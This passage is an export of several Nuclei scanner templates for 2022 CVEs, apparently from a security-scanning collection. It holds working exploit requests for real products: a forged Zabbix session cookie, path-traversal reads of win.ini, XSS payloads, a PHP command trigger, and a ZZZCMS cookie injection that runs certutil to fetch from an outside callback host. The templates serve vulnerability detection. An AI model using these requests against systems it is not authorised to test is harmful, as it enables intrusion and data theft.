epss-score: 0.34559\n epss-percentile: 0.9671\n cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: zabbix\n product: zabbix\n tags: cve,cve2022,zabbix,auth-bypass,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zabbix/setup.php\"\n - \"{{BaseURL}}/setup.php\"\n\n stop-at-first-match: true\n\n headers:\n Cookie: \"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Database\"\n - \"host\"\n - \"port\"\n - \"Zabbix\"\n condition: and\n\n - type: word\n words:\n part: header\n - \"youtube_main\"\n - \"support.google.com\"\n condition: and\n negative: true\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220695464715fb5b707e371729bca1f71d84025cef6fd8cc1e7f5928addeafca49b022100800c9be1e34778f85f48887851c69b484d2b920f2b0f4eda74127fb5dbc58394:922c64590222798bb761d5b6d8e72950", "hash": "0fb5761b99d6328f1b4490fd25363787", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a5" }, "name": "CVE-2022-2314.yaml", "content": "id: CVE-2022-2314\n\ninfo:\n name: WordPress VR Calendar <=2.3.2 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82\n - https://wordpress.org/plugins/vr-calendar-sync/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2314\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2314\n cwe-id: CWE-78,NVD-CWE-noinfo\n epss-score: 0.26874\n epss-percentile: 0.96341\n cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vr_calendar_project\n product: vr_calendar\n framework: wordpress\n tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"phpinfo\"\n - \"PHP Version\"\n condition: and\n\n - type: word\n part: body_1\n words:\n - \"vrc-calendar\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206692348e2633018a23d148415e047563294843e45c7b5ee7d28a232472ccfa8a0220754a5291e01ce0d4ea4c998c533782d53abed0b92402761dd3c6984b8e34ac71:922c64590222798bb761d5b6d8e72950", "hash": "43f77ec809ec94c76321fa79a63ac1a1", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a6" }, "name": "CVE-2022-23178.yaml", "content": "id: CVE-2022-23178\n\ninfo:\n name: Crestron Device - Credentials Disclosure\n author: gy741\n severity: critical\n description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.\n impact: |\n An attacker can obtain sensitive credentials, leading to unauthorized access and potential compromise of the device.\n remediation: |\n Update the Crestron Device firmware to the latest version to mitigate the vulnerability.\n reference:\n - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23178\n - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E\n - https://www.redteam-pentesting.de/advisories/rt-sa-2021-009\n - https://github.com/Threekiii/Awesome-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23178\n cwe-id: CWE-287\n epss-score: 0.03228\n epss-percentile: 0.90998\n cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: crestron\n product: hd-md4x2-4k-e_firmware\n tags: cve,cve2022,crestron,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/aj.html?a=devi\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"uname\":'\n - '\"upassword\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d1c5b7aab36ebb46a67356cf0a5a48a305da382e9d3a43ac270e79ff9357f562022100cdcbe30a39cf91a64f0a091ef2be9cb9310852f41f338fdd38b35176ed55b2b2:922c64590222798bb761d5b6d8e72950", "hash": "a1fc3487fde59db25ac3c057d2f70f64", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a7" }, "name": "CVE-2022-23347.yaml", "content": "id: CVE-2022-23347\n\ninfo:\n name: BigAnt Server v5.6.06 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06.\n reference:\n - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23347\n - http://bigant.com\n - https://www.bigantsoft.com/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-23347\n cwe-id: CWE-22\n epss-score: 0.1468\n epss-percentile: 0.95635\n cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bigantsoft\n product: bigant_server\n shodan-query: http.html:\"BigAnt\"\n tags: cve,cve2022,bigant,lfi,bigantsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201d2b033a4d065dc457c2bd88fd09609a69b0f0999e1d44242fc8387d1c118276022052c1fd2978c3590d540c66759ce5c8203011da6e4d81139306e90fc70958a40e:922c64590222798bb761d5b6d8e72950", "hash": "d3f4aebca4690d3850851c073c32d0b9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a8" }, "name": "CVE-2022-23348.yaml", "content": "id: CVE-2022-23348\n\ninfo:\n name: BigAnt Server 5.6.06 - Improper Access Control\n author: arafatansari\n severity: medium\n description: |\n BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the access control issue.\n reference:\n - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348\n - http://bigant.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23348\n - https://www.bigantsoft.com/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-23348\n cwe-id: CWE-916\n epss-score: 0.00425\n epss-percentile: 0.71717\n cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bigantsoft\n product: bigant_server\n shodan-query: http.html:\"bigant\"\n tags: cve,cve2022,bigant,unauth,exposure,bigantsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Runtime/Data/ms_admin.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"user_name\";'\n - '\"user_pwd\";'\n - '\"user_id\";'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cc5a1e9ab10a42df26c83f3bba3e5577c2c8cfe4b97d834eba3461a9745d8f2d022100c9eba2a9ce77b634e7a4f2af4a07997e509bbc86520f70968b5457b7f55aa102:922c64590222798bb761d5b6d8e72950", "hash": "3d47eb8deceac77cce442826631f67a9", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a9" }, "name": "CVE-2022-23544.yaml", "content": "id: CVE-2022-23544\n\ninfo:\n name: MeterSphere < 2.5.0 SSRF\n author: j4vaovo\n severity: medium\n description: |\n MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23544\n - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj\n - https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-23544\n cwe-id: CWE-918,CWE-79\n epss-score: 0.00083\n epss-percentile: 0.34435\n cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: metersphere\n product: metersphere\n shodan-query: html:\"metersphere\"\n fofa-query: title=\"MeterSphere\"\n tags: cve2022,cve,metersphere,ssrf,oast,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resource/md/get/url?url=http://oast.pro\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Interactsh Server'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202c5b2eb5590a975c3168c5bf10ecafe306c4717f4461655b26d62aef269d5f3602207433e872a215f20e193af9adca4050f730dde0a9a36d95ba76a624d43780047a:922c64590222798bb761d5b6d8e72950", "hash": "1ec325044d0de70e7966351c12af0d7c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084aa" }, "name": "CVE-2022-2373.yaml", "content": "id: CVE-2022-2373\n\ninfo:\n name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure\n author: theamanrawat,theabhinavgaur\n severity: medium\n description: |\n WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31\n - https://wordpress.org/plugins/simply-schedule-appointments/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2373\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2373\n cwe-id: CWE-862\n epss-score: 0.00292\n epss-percentile: 0.68538\n cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nsqua\n product: simply_schedule_appointments\n framework: wordpress\n tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/ssa/v1/users\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - application/json\n\n - type: regex\n regex:\n - 'response_code\":200'\n - '\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b940545db7a1a8e51cb87f781d4b9f7ff7bdb733dc9e3e9655204af3837f5bba02200e130cc811f3149c5dadcd9d423811fc7ad8ca0528144218ddec9b6af10fc4af:922c64590222798bb761d5b6d8e72950", "hash": "e391e89a6c2f96d2fd708571124648b6", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ab" }, "name": "CVE-2022-2376.yaml", "content": "id: CVE-2022-2376\n\ninfo:\n name: WordPress Directorist <7.3.1 - Information Disclosure\n author: Random-Robbie\n severity: medium\n description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.\n impact: |\n An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.\n remediation: Fixed in version 7.3.1.\n reference:\n - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2376\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2376\n cwe-id: CWE-862\n epss-score: 0.04177\n epss-percentile: 0.92016\n cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpwax\n product: directorist\n framework: wordpress\n tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'directorist-authors__card__details__top'\n - 'directorist-authors__card__info-list'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cb70d03524416c4cc1af8cff5314a511b64abcf5e9026d7dbdb016fba5ddeda0022021c8dcef9f3fad8ea0d0eb19aa59daf7ce4f6d281296bc4b869f297db54aab20:922c64590222798bb761d5b6d8e72950", "hash": "5fd581985c6bc12eb66e83024c7432fc", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ac" }, "name": "CVE-2022-23779.yaml", "content": "id: CVE-2022-23779\n\ninfo:\n name: Zoho ManageEngine - Internal Hostname Disclosure\n author: cckuailong\n severity: medium\n description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.\n impact: |\n An attacker could use the disclosed internal hostnames to plan targeted attacks, gain unauthorized access, or perform reconnaissance on the internal network.\n remediation: |\n Apply the latest security patch or update provided by Zoho ManageEngine to fix the internal hostname disclosure vulnerability.\n reference:\n - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html\n - https://github.com/fbusr/CVE-2022-23779\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23779\n - https://github.com/soosmile/POC\n - https://github.com/zecool/cve\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-23779\n cwe-id: CWE-200\n epss-score: 0.00667\n epss-percentile: 0.79289\n cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_desktop_central\n fofa-query: app=\"ZOHO-ManageEngine-Desktop\"\n tags: cve,cve2022,zoho,exposure,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/themes\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - '/themes/'\n - 'text/html'\n condition: and\n\n - type: word\n part: location\n negative: true\n words:\n - '{{Host}}'\n\n - type: word\n words:\n - '

    301 Moved Permanently

    '\n\n - type: regex\n part: location\n regex:\n - 'https?:\\/\\/(.*):'\n\n - type: status\n status:\n - 301\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 'https?:\\/\\/(.*):'\n part: location\n# digest: 4a0a00473045022100be0284c71a40a96363c13ed13bf8c275727ab6175539a57eafe9a886c8cf0d980220272096f146cc3ae542df232fbe589aa11cad6fcbfdfb8adaa4154e97c8588ff1:922c64590222798bb761d5b6d8e72950", "hash": "d3041d2668d6372fb1ac189644770b2b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ad" }, "name": "CVE-2022-2379.yaml", "content": "id: CVE-2022-2379\n\ninfo:\n name: WordPress Easy Student Results <=2.2.8 - Improper Authorization\n author: theamanrawat\n severity: high\n description: |\n WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number.\n impact: |\n An attacker can gain access to sensitive student information, potentially compromising their privacy and security.\n remediation: |\n Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability.\n reference:\n - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6\n - https://wordpress.org/plugins/easy-student-results/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2379\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2379\n cwe-id: CWE-862\n epss-score: 0.01934\n epss-percentile: 0.87376\n cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: easy_student_results_project\n product: easy_student_results\n framework: wordpress\n tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project\n\nhttp:\n - raw:\n - |\n GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\n Host: {{Hostname}}\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '\"departments\":'\n - 'batches\":'\n condition: and\n\n - type: word\n part: body_2\n words:\n - 'meta_data'\n - '\"name\":\"'\n - '\"registration_no\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e1f2b124c765614d3ab35ff74edf5bbb68b70131be4b3b60a91c089395bc21a802200331ef6a4224f062eb1af5715667a63cb2fbc4407cd604a4a3dc649f383eef79:922c64590222798bb761d5b6d8e72950", "hash": "608652885c9681d92ceaf543696bd1fc", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ae" }, "name": "CVE-2022-23808.yaml", "content": "id: CVE-2022-23808\n\ninfo:\n name: phpMyAdmin < 5.1.2 - Cross-Site Scripting\n author: cckuailong,daffainfo\n severity: medium\n description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability.\n reference:\n - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A\n - https://github.com/dipakpanchal456/CVE-2022-23808\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23808\n - https://www.phpmyadmin.net/security/PMASA-2022-2/\n - https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-23808\n cwe-id: CWE-79\n epss-score: 0.00743\n epss-percentile: 0.78912\n cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpmyadmin\n product: phpmyadmin\n shodan-query: http.component:\"phpmyadmin\"\n tags: cve,cve2022,phpmyadmin,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n - \"{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\">\"\n - \"

    Add a new server

    \"\n - \"phpMyAdmin setup\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022038d5ba39a2b759095a3f8426c738ce15cf6c83b54e32b080e617ac13d733503a022100e570ecb30aa4d1b1fe02f8867294888554e1bb76b68135ab78cb7e93cf859e4e:922c64590222798bb761d5b6d8e72950", "hash": "80fbe55c38d3a4fd841170de65d420f2", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084af" }, "name": "CVE-2022-2383.yaml", "content": "id: CVE-2022-2383\n\ninfo:\n name: WordPress Feed Them Social <3.0.1 - Cross-Site Scripting\n author: akincibor\n severity: medium\n description: |\n WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531\n - https://wordpress.org/plugins/feed-them-social/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2383\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2383\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45893\n cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: slickremix\n product: feed_them_social\n framework: wordpress\n tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Feed Them Social'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src onerror=alert(document.domain)><br/>'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022007c261c3ec560f291c2c68c92b556242e52fb67a3f9daa340a1f02f9b9b3091802204fccfa62735961d779929f897049f006dae4f29bcf27a5e66c59bc53889f2607:922c64590222798bb761d5b6d8e72950", "hash": "752b10c80a71339fc86260801aa12265", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b0" }, "name": "CVE-2022-23854.yaml", "content": "id: CVE-2022-23854\n\ninfo:\n name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion\n author: For3stCo1d\n severity: high\n description: |\n AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/cve/CVE-2022-23854\n - https://www.aveva.com\n - https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854\n - https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-23854\n cwe-id: CWE-22,CWE-23\n epss-score: 0.66314\n epss-percentile: 0.97841\n cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: aveva\n product: intouch_access_anywhere\n shodan-query: http.html:\"InTouch Access Anywhere\"\n tags: cve,cve2022,lfi,packetstorm,aveva,intouch\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'for 16-bit app support'\n - 'extensions'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/ini'\n - 'application/octet-stream'\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203ba9de7758c76694c9619b5b90dc1c5aad849e1e881d89f2fcb805ccd73226cf0220771816d83704155d2db5ac2473fcafb8e0175c8d3897d0457d88af07cbf5500e:922c64590222798bb761d5b6d8e72950", "hash": "82dfec65b7c11faec5d582db1fddbf2e", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b1" }, "name": "CVE-2022-23881.yaml", "content": "id: CVE-2022-23881\n\ninfo:\n name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp.\n reference:\n - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md\n - http://www.zzzcms.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23881\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23881\n cwe-id: CWE-77\n epss-score: 0.16723\n epss-percentile: 0.95904\n cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zzzcms\n product: zzzphp\n tags: cve,cve2022,rce,zzzphp,zzzcms\n\nhttp:\n - raw:\n - |\n GET /?location=search HTTP/1.1\n Host: {{Hostname}}\n Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 